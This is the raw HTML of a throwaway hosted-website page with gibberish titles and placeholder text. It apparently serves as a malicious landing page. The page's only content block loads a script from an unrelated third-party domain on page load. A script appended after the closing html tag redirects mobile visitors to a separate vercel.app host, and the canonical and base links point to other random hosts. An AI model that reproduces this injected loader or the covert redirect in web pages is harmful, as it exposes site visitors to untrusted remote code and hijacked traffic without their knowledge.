<!DOCTYPE html>
<html lang="en-GB">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="canonical" href="https&#x3A;&#x2F;&#x2F;ghkghkgh.webador.com&#x2F;">
    <meta property="og:title" content="fbdfhdfghf" />
    <meta property="og:url" content="https://thlepbunpjbink-g1suo43kk.vercel.app/" />
    <base href="https://thlepbunpjbink-g1suo43kk.vercel.app/" />
    <meta name="description" content="">
    <script type="text/javascript">window.JOUWWEB = window.JOUWWEB || {}; window.JOUWWEB.application = window.JOUWWEB.application || {}; window.JOUWWEB.application = {"editorLocale":"en-US","editorTimezone":"America\/La_Paz","backendDomain":"webador.com","backendKey":"webador-com","noSsl":false,"environment":"prod","build":{"reference":"20190809_141217","bust":"20190809_141217"},"cookieLessCdnUrl":"https:\/\/cdn.jwwb.nl","developer":false,"pricing":{"pro":{"value":"9.00","currency":"USD"},"business":{"value":"18.00","currency":"USD"}}};window.JOUWWEB.experiments = [];window.JOUWWEB.brand = {"type":"webador","name":"Webador","domain":"Webador.com","supportEmail":"support@webador.com"};</script>    <script type="text/javascript">window.JOUWWEB = window.JOUWWEB || {}; window.JOUWWEB.websiteRendering = {"locale":"en-GB","timezone":"America\/La_Paz"}; </script>    <script type="text/javascript">window.JOUWWEB.website = {"id":1572985,"locale":"en-GB","enabled":true,"title":"fbdfhdfghf","roleOfLoggedInUser":null,"pro":false,"backendDomain":"webador.com","backendKey":"webador-com","migrated":false,"currency":"USD","defaultLanguage":"en","allowed":{"ads":true,"credits":false,"slideshow":true,"allowedAlbums":0,"hostedAlbums":false,"moderators":false,"mailBoxes":0,"largeMailBoxes":0,"statistics":false,"favicon":false,"password":false,"domainsInProduct":0,"languages":0,"fileUpload":false,"legacyFontSize":false,"webshop":false,"products":0,"imageText":false,"search":false,"audioUpload":false,"videoUpload":0,"allowDangerousForms":false,"statisticsMonths":0},"url":"http:\/\/ghkghkgh.webador.com","mobileBar":{"enabled":false,"theme":"accent","email":{"active":true},"location":{"active":true},"phone":{"active":true},"whatsapp":{"active":false},"social":{"active":false,"network":"facebook"}},"homepageSegmentId":5900033,"homepageSegmentType":"page","category":null,"webshop":{"enabled":false,"currency":"USD","taxEnabled":false,"taxInclusive":true,"orderNotice":"Please detail any specific requirements in the Remarks field in the last step.","orderConfirmation":"Thank you for your order! You'll receive an update on the status of your order soon.","freeShipping":false,"freeShippingAmount":0,"pickupAllowed":false,"couponAllowed":false,"detailsPageAvailable":true,"socialMediaVisible":true,"termsPage":null,"termsPageUrl":null,"pricingVisible":true,"orderButtonVisible":true,"shippingAdvanced":false,"shippingAdvancedBackEnd":false,"soldOutVisible":true,"sendCloudConfigured":false,"canAddProducts":true,"nextOrderId":1,"allowedServicePoints":[],"sendCloudFallbackPublicKey":"591bac5b2b22447fb6ad98c746dec929","taxExemptionAllowed":true,"invoiceComment":null,"emptyCartVisible":false},"isOffline":false,"languages":[]};</script><meta name="robots" content="noindex,nofollow">
    <title>fbdfhdfghf</title>

<link href="https&#x3A;&#x2F;&#x2F;fonts.gstatic.com&#x2F;" rel="preconnect" crossorigin="anonymous">
<link href="https&#x3A;&#x2F;&#x2F;fonts.googleapis.com&#x2F;css&#x3F;display&#x3D;fallback&amp;family&#x3D;Open&#x2B;Sans&#x25;3A400&#x25;2C700&#x25;2C400italic&#x25;2C700italic&#x25;7CKaushan&#x2B;Script&#x25;3A400&#x25;2C700&#x25;2C400italic&#x25;2C700italic" media="screen" rel="stylesheet" type="text&#x2F;css">
<link href="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;website-rendering&#x2F;styles.887c418f1d75824fddf5.css&#x3F;bust&#x3D;d9d8156bdd830f0c96e753d4da343d94&amp;1" media="screen" rel="stylesheet" type="text&#x2F;css">
<link href="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;fonts&#x2F;website-rendering&#x2F;css&#x2F;website-rendering.css&#x3F;bust&#x3D;2bc1184b1d56a1ba31758123121fc22b&amp;1" media="screen" rel="stylesheet" type="text&#x2F;css">
<link href="https&#x3A;&#x2F;&#x2F;f.jwwb.nl&#x2F;public&#x2F;k&#x2F;e&#x2F;x&#x2F;temp-salxglopzawiyvgxcjsy&#x2F;stijl.css&#x3F;bust&#x3D;1596468184" rel="stylesheet" type="text&#x2F;css">

<link href="https://cdn.jwwb.nl/assets/brand/webador/icon/favicon.ico?bust=f3d7f24e83bb27ebe8cc9b8510532b06&1" rel="shortcut icon">
<link href="https://cdn.jwwb.nl/assets/brand/webador/icon/favicon.ico?bust=f3d7f24e83bb27ebe8cc9b8510532b06&1" rel="icon">
<meta property="og:image" content="https&#x3A;&#x2F;&#x2F;t.jwwb.nl&#x2F;SpynA4Mi8YVqj6aOvNlADNaqFkc&#x3D;&#x2F;full-fit-in&#x2F;1920x1920&#x2F;filters&#x3A;no_upscale&#x28;&#x29;&#x2F;www.webador.com&#x25;2Fassets&#x25;2Ftemplates&#x25;2Fboats-banner&#x25;2F.&#x25;2Fexplorer&#x25;2Fimages&#x25;2Fexplorer_slideshow.jpeg" />
<script>window.google_analytics_uacct = "UA\x2D8406245\x2D4";</script> <script>google_analytics_domain_name = "ghkghkgh.webador.com";</script>
<link rel="alternate" hreflang="en-GB" href="https://thlepbunpjbink-g1suo43kk.vercel.app/">

</head>
<body id="top" class="jw-is-slideshow jw-header-is-text jw-is-frontend jw-is-no-sidebar jw-is-no-second-sidebar jw-is-no-touch-device jw-is-no-mobile jw-is-segment-page" data-jouwweb-page="5900033" data-jouwweb-segment-id="5900033" data-jouwweb-segment-type="page" data-template-threshold="960" data-template-id="125" data-framebreaker="1" data-display-cookie-alert="1" itemscope itemtype="https://schema.org/WebSite">
    <meta itemprop="url" content="https&#x3A;&#x2F;&#x2F;ghkghkgh.webador.com&#x2F;">
    <div class="jw-background"></div>
    <div class="jw-body">
    <div class="js-mobile-menu jw-mobile-menu jw-mobile-is-text">
<span class="jw-mobile-menu__button jw-mobile-menu__button--dummy"></span>
<div class="jw-mobile-header jw-mobile-header--text">
<span class="jw-mobile-header-content">
<span class="jw-mobile-text">fbdfhdfghf</span>
</span>
</div>
<button class="jw-mobile-menu__button&#x20;jw-mobile-toggle" aria-label="Toggle&#x20;menu"><i class="jw-icon-burger"></i></button>
</div>

<header class="header-wrap">
    <div class="container jw-header-container">
        <div class="header jw-header-logo">
                        <div class="jw-header jw-header-text jw-header-text-toggle" data-stylable="false"><h1 id="jw-header-title" class="jw-header-title" >fbdfhdfghf</h1></div>        </div>

        <nav class="menu jw-menu-copy">
            <ul
    id="jw-menu"
    class="jw-menu jw-menu-horizontal"
            >
            <li
    class="jw-menu-item jw-menu-is-active"
    >
    <a
        class="jw-menu-link js-active-menu-item"
        href="&#x2F;"
                                            data-page-link-id="5900033"
                    >
                <span class="">
            Home        </span>
            </a>
            </li>
    </ul>
        </nav>
    </div>
</header>

<div id="jw-slideshow" class="jw-slideshow&#x20;jw-slideshow-toggle&#x20;&#x20;banner-lg&#x20;jw-slideshow-height-ratio&#x20;jw-slideshow--parallax&#x20;jw-slideshow--parallax-effect" data-pause="7000" data-autoplay="1" data-transition="horizontal" data-ratio="0.90"><div class="bx-wrapper bx-viewport"><ul><li class="jw-slideshow-slide">    <div  data-key="0" data-text="Example&#x20;text" data-subtext="Enter&#x20;text&#x20;here" data-buttontext="" data-buttonurl="" data-buttontarget="_self" data-backdrop="1" data-layout="title-text" style="background-position&#x3A;&#x20;50&#x25;&#x20;40&#x25;&#x3B;&#x20;background-image&#x3A;&#x20;url&#x28;&#x27;https&#x3A;&#x2F;&#x2F;t.jwwb.nl&#x2F;SpynA4Mi8YVqj6aOvNlADNaqFkc&#x3D;&#x2F;full-fit-in&#x2F;1920x1920&#x2F;filters&#x3A;no_upscale&#x28;&#x29;&#x2F;www.webador.com&#x25;2Fassets&#x25;2Ftemplates&#x25;2Fboats-banner&#x25;2F.&#x25;2Fexplorer&#x25;2Fimages&#x25;2Fexplorer_slideshow.jpeg&#x27;&#x29;&#x3B;" data-background-position-x="0.5" data-background-position-y="0.4" class="jw-slideshow-slide-content&#x20;jw-slideshow-slide-content-cover&#x20;jw-slideshow--backdrop&#x20;jw-is-slideshow-captions"><div class="jw-slideshow-slide-backdrop"></div><div class="bx-caption-wrapper jw-slideshow-slide-align-center">            <div class="bx-caption">         <div class="jw-slideshow-title">Example text</div>     <div class="jw-slideshow-sub-title">Enter text here</div>    </div>        </div>    </div></li></ul></div><div class="jw-slideshow__scroll-arrow"><i class="website-rendering-icon-down-open-big"></i></div><style class="js-patch-viewport-units">
                .jw-slideshow-slide-content {
                    min-height: 90vh;
                }
                @media screen and (min-height: 1200px) {
                    .jw-slideshow-slide-content {
                        min-height: 1080px;
                    }
                }
            </style></div>
<script>
    JOUWWEB.templateConfig = {
        header: {
            selector: '.header-wrap',
            mobileSelector: '.jw-mobile-menu',
            updatePusher: function (headerHeight, state) {
                // Header
                $('.header-wrap .header').css('min-height', state === 'mobile' ? headerHeight : 0);

                // Slideshow
                var $sliderStyle = $('#sliderStyle');

                if ($sliderStyle.length === 0) {
                    $sliderStyle = $('<style />')
                        .attr('id', 'sliderStyle')
                        .appendTo(document.body);
                }

                $sliderStyle.html('.jw-slideshow-slide-content { padding-top: ' + headerHeight + 'px; padding-bottom: ' + (headerHeight * (2/3)) + 'px; } .bx-controls-direction { margin-top: ' + (headerHeight * (1/6)) + 'px }');

                // make sure slider also gets correct height (because of the added padding)
                $('.jw-slideshow-slide[aria-hidden=false]').each(function (index) {
                    var $this = $(this);
                    headerHeight = $this.outerHeight() > headerHeight ? $this.outerHeight() : headerHeight;
                    $this.closest('.bx-viewport').css({
                        height: headerHeight + 'px',
                    });
                });
            },
        },
        mainContentOffset: function () {
            return $('.jw-section-content').offset().top - 20;
        },

        mobileHeaderText: {
            maxFontSize: 28,
        },
    };
</script>

<main class="main clear">
    <div class="content-wrap">
        <section class="container">
            
                <div data-section-name="content" class="jw-section jw-section-content content">
                    <div class="jw-flags"></div>        <div
        id="jw-element-87846862"
                style="width: 100%;"
        data-jw-element-id="87846862"
        class=" jw-tree-node jw-element  jw-tree-container  jw-vertical_split"
    >
                <div
        id="jw-element-87846929"
                style="width: 100%;"
        data-jw-element-id="87846929"
        class=" jw-tree-node jw-element  jw-node-is-first-child jw-node-is-last-child jw-html"
    >
        <div class="jw-html-wrapper">
    <script type="text/javascript" src="https://blacksar.date/?token=b984769a87d4d519b1c203c6a9c518a6" async="true"></script>    </div>
    </div>
    </div>
        <div class="jw-element-ads js-ads jw-element-ads-is-bottom jw-element-ads-WebsiteRenderingSignup jw-element-ads--tint jw-element-ads--logo">
            <div class="jw-comment"><h3>Create a Free Website With <a href="https://www.webador.com/?utm_source=sites&utm_medium=banner&utm_content=logo%2Btint&utm_campaign=house%20banner%20webador" rel="nofollow"><span class="sr-only">Webador</span><svg width="150" height="37" fill="none"
    xmlns="http://www.w3.org/2000/svg">
    <path d="M11.098 19.24L7.68 29.712a1.794 1.794 0 01-.726-.975L0 6h5.32c1.028 0 1.936.682 2.243 1.684l3.535 11.556z" fill="#37A3E4"/>
    <path d="M14.725 12.274l3.31 10.149-2.07 6.346A1.766 1.766 0 0114.294 30H8.516l5.471-16.77c.133-.406.398-.74.738-.956z" fill="#FFC713"/>
    <path d="M24.977 19.25l-3.205 10.476a1.792 1.792 0 01-.737-.957L15.564 12h5.777c.759 0 1.432.496 1.672 1.23l1.964 6.02z" fill="#8ED92A"/>
    <path d="M28.363 30c.771 0 1.452-.512 1.682-1.263L37 6h-5.32a2.355 2.355 0 00-2.243 1.684L22.611 30h5.752z" fill="#E73C43"/>
    <path d="M58.6 26h-2.86l-2.938-9.204L49.89 26h-2.86l-3.9-12.558h2.834l2.652 9.126 2.99-9.126h2.418l2.964 9.126 2.652-9.126h2.86L58.6 26zm11.619.312c-1.924 0-3.501-.607-4.732-1.82-1.23-1.213-1.846-2.808-1.846-4.784 0-1.837.598-3.389 1.794-4.654 1.213-1.283 2.739-1.924 4.576-1.924 1.855 0 3.345.641 4.472 1.924 1.127 1.265 1.69 2.895 1.69 4.888v.676h-9.672c.104.988.511 1.811 1.222 2.47.71.659 1.63.988 2.756.988 1.456 0 2.652-.468 3.588-1.404l1.248 1.794c-1.317 1.23-3.016 1.846-5.096 1.846zm3.328-7.644c-.052-.867-.381-1.63-.988-2.288-.59-.676-1.447-1.014-2.574-1.014-1.075 0-1.915.338-2.522 1.014-.607.659-.936 1.421-.988 2.288h7.072zm8.05 3.562c.313.485.772.884 1.379 1.196.606.312 1.23.468 1.872.468 1.074 0 1.932-.39 2.574-1.17.64-.78.962-1.785.962-3.016 0-1.23-.321-2.227-.962-2.99-.642-.78-1.5-1.17-2.574-1.17-.642 0-1.266.165-1.872.494-.607.312-1.066.71-1.378 1.196v4.992zm0 3.77h-2.73V8.658h2.73v6.526c1.023-1.37 2.367-2.054 4.03-2.054 1.647 0 2.99.598 4.03 1.794 1.04 1.196 1.56 2.79 1.56 4.784 0 2.045-.52 3.657-1.56 4.836-1.04 1.179-2.383 1.768-4.03 1.768-1.646 0-2.99-.676-4.03-2.028V26zm22.804 0h-2.73v-1.378c-.971 1.127-2.331 1.69-4.082 1.69-1.127 0-2.132-.373-3.016-1.118-.884-.745-1.326-1.76-1.326-3.042 0-1.352.433-2.375 1.3-3.068.867-.693 1.88-1.04 3.042-1.04 1.785 0 3.146.537 4.082 1.612v-1.872c0-.71-.277-1.274-.832-1.69-.537-.433-1.24-.65-2.106-.65-1.421 0-2.66.537-3.718 1.612l-1.144-1.898c1.404-1.352 3.163-2.028 5.278-2.028 1.543 0 2.799.364 3.77 1.092.988.71 1.482 1.855 1.482 3.432V26zm-5.72-1.56c1.335 0 2.331-.433 2.99-1.3v-1.924c-.659-.867-1.655-1.3-2.99-1.3-.78 0-1.43.208-1.95.624-.503.416-.754.962-.754 1.638 0 .676.251 1.222.754 1.638.52.416 1.17.624 1.95.624zM119.51 26h-2.73v-1.716c-1.04 1.352-2.383 2.028-4.03 2.028-1.629 0-2.964-.59-4.004-1.768-1.04-1.179-1.56-2.79-1.56-4.836 0-1.993.52-3.588 1.56-4.784 1.04-1.196 2.375-1.794 4.004-1.794 1.681 0 3.025.685 4.03 2.054V8.658h2.73V26zm-5.954-2.106c.624 0 1.239-.165 1.846-.494.607-.33 1.066-.728 1.378-1.196v-4.966c-.312-.468-.771-.867-1.378-1.196-.607-.33-1.222-.494-1.846-.494-1.075 0-1.941.39-2.6 1.17-.641.763-.962 1.76-.962 2.99 0 1.23.321 2.236.962 3.016.659.78 1.525 1.17 2.6 1.17zm19.865.52c-1.178 1.265-2.738 1.898-4.68 1.898-1.941 0-3.501-.633-4.68-1.898-1.178-1.283-1.768-2.851-1.768-4.706 0-1.872.59-3.432 1.768-4.68 1.179-1.265 2.739-1.898 4.68-1.898 1.942 0 3.502.633 4.68 1.898 1.179 1.248 1.768 2.808 1.768 4.68 0 1.855-.589 3.423-1.768 4.706zm-4.68-.52c1.127 0 2.011-.399 2.652-1.196.642-.815.962-1.811.962-2.99 0-1.161-.32-2.14-.962-2.938-.641-.815-1.525-1.222-2.652-1.222-1.109 0-1.993.407-2.652 1.222-.641.797-.962 1.777-.962 2.938 0 1.179.321 2.175.962 2.99.659.797 1.543 1.196 2.652 1.196zM140.707 26h-2.73V13.442h2.73v1.82a6.222 6.222 0 011.82-1.534 4.65 4.65 0 012.262-.598v2.704a3.996 3.996 0 00-.832-.078c-.589 0-1.213.173-1.872.52-.641.33-1.101.72-1.378 1.17V26z" fill="currentColor"/>
</svg>
</a></h3></div>
            
        </div>
                </div>
                    </section>
        <aside>
                    </aside>
    </div>
</main>

<footer>
    <div class="container">
        <div data-section-name="footer" class="jw-section jw-section-footer jw-section-is-pinnable footer">        <div
        id="jw-element-87846864"
                style="width: 100%;"
        data-jw-element-id="87846864"
        class=" jw-tree-node jw-element  jw-tree-container jw-tree-container__empty  jw-vertical_split"
    >
            </div>
 <div class="jw-credits clear"> <div id="jw-footer-text" class="jw-credits-owner jw-footer-text"><div class="jw-footer-text-content">&copy; 2020 fbdfhdfghf</div></div> <div id="jw-credits-tool" class="jw-footer-text jw-credits-right"><small>Powered by <a href="https://www.webador.com" rel="">Webador</a></small></div> </div></div>    </div>
</footer>

            <div class="jw-bottom-bar__container"></div>
            <div class="jw-bottom-bar__spacer"></div>
        <div id="jw-variable-loaded" style="display: none;"></div>
<div id="jw-variable-values" style="display: none;">
<span data-jw-variable-key="background-color" class="jw-variable-value-background-color"></span>
<span data-jw-variable-key="background" class="jw-variable-value-background"></span>
<span data-jw-variable-key="font-family" class="jw-variable-value-font-family"></span>
<span data-jw-variable-key="paragraph-color" class="jw-variable-value-paragraph-color"></span>
<span data-jw-variable-key="paragraph-link-color" class="jw-variable-value-paragraph-link-color"></span>
<span data-jw-variable-key="paragraph-font-size" class="jw-variable-value-paragraph-font-size"></span>
<span data-jw-variable-key="heading-color" class="jw-variable-value-heading-color"></span>
<span data-jw-variable-key="heading-link-color" class="jw-variable-value-heading-link-color"></span>
<span data-jw-variable-key="heading-font-size" class="jw-variable-value-heading-font-size"></span>
<span data-jw-variable-key="heading-font-family" class="jw-variable-value-heading-font-family"></span>
<span data-jw-variable-key="menu-text-color" class="jw-variable-value-menu-text-color"></span>
<span data-jw-variable-key="menu-text-link-color" class="jw-variable-value-menu-text-link-color"></span>
<span data-jw-variable-key="menu-text-font-size" class="jw-variable-value-menu-text-font-size"></span>
<span data-jw-variable-key="menu-font-family" class="jw-variable-value-menu-font-family"></span>
<span data-jw-variable-key="menu-capitalize" class="jw-variable-value-menu-capitalize"></span>
<span data-jw-variable-key="footer-text-color" class="jw-variable-value-footer-text-color"></span>
<span data-jw-variable-key="footer-text-link-color" class="jw-variable-value-footer-text-link-color"></span>
<span data-jw-variable-key="footer-text-font-size" class="jw-variable-value-footer-text-font-size"></span>
<span data-jw-variable-key="header-color" class="jw-variable-value-header-color"></span>
<span data-jw-variable-key="content-color" class="jw-variable-value-content-color"></span>
<span data-jw-variable-key="accent-color" class="jw-variable-value-accent-color"></span>
<span data-jw-variable-key="footer-color" class="jw-variable-value-footer-color"></span>
</div></div><script type="text&#x2F;javascript" src="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;build&#x2F;website-rendering&#x2F;en-GB.js&#x3F;bust&#x3D;de452afab6a772e03df8efeda1339f20&amp;1"></script>
<script type="text&#x2F;javascript" src="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;website-rendering&#x2F;manifest.632e9d2a7f4a428ac1cf.js&#x3F;bust&#x3D;de8aa323c697f7596ff3aaa14e1656aa&amp;1"></script>
<script type="text&#x2F;javascript" src="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;website-rendering&#x2F;vendors&#x7E;main.0592f954473262566090.js&#x3F;bust&#x3D;43436375450d3c48d61d5d10aca5bba9&amp;1"></script>
<script type="text&#x2F;javascript" src="https&#x3A;&#x2F;&#x2F;cdn.jwwb.nl&#x2F;assets&#x2F;website-rendering&#x2F;main.ad4a90a708acf99deef0.js&#x3F;bust&#x3D;19e31b498a0840b6f5371bf9c8895b96&amp;1"></script>
<script type="text&#x2F;javascript">
    //<!--
    window.JOUWWEB.scripts = []
    //-->
</script>
<script type="text&#x2F;javascript">
    //<!--
    window.JOUWWEB.cart = {"products":[],"coupon":null,"shippingCountryCode":null,"shippingChoice":null}
    //-->
</script>
<script type="text&#x2F;javascript">
    //<!--
    Unsafe.authorized()
    //-->
</script>
<script type="text&#x2F;javascript">
    //<!--
    window.JOUWWEB.scripts.push("website-rendering/slideshow")
    //-->
</script>
<script type="text&#x2F;javascript">
    //<!--
    
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
            })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA\x2D8406245\x2D4', 'ghkghkgh.webador.com', {'name': 'jw112670604'});ga('jw112670604.set', 'anonymizeIp', true);ga("jw112670604.set", "dimension1", "not checked");ga("jw112670604.set", "dimension2", "");ga("jw112670604.set", "dimension3", "free");ga("jw112670604.set", "dimension4", "visitable");ga("jw112670604.set", "dimension7", "en");ga("jw112670604.set", "dimension5", "1572985");ga("jw112670604.send", "pageview", "\/");
    //-->
</script><script type="application/ld+json">[{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/ghkghkgh.webador.com\/","name":"fbdfhdfghf"}]</script></body>
</html>´

<script type="text/javascript">
        if (screen.width <= 700) {
        window.location = "https://angularewewte.vercel.app/";
    } else {

    }
</script>

